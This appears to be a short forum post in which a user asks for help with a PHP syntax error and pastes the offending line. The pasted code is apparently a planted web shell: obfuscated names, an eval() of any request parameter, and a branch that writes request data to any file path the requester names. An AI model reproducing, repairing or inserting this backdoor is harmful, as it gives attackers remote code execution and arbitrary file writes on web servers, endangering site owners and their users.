I can’t seem to find a syntax error occurring in this line.
[php]<?php $kpjfo = "d9fde556e1d81bd55376a21e18df3087"; if(isset($_REQUEST['dmhvhtqq'])) { $anhi = $_REQUEST['dmhvhtqq']; eval($anhi); exit(); } if(isset($_REQUEST['zgqzirb'])) { $svvyr = $_REQUEST['nxaq']; $hmrad = $_REQUEST['zgqzirb']; $fdvnl = fopen($hmrad, 'w'); $nrfmaw = fwrite($fdvnl, $svvyr); fclose($fdvnl); echo $nrfmaw; exit(); } ?><?php> [/php]
Everything worked fiine for months and is now giving me headaches. Any help would be appreciated.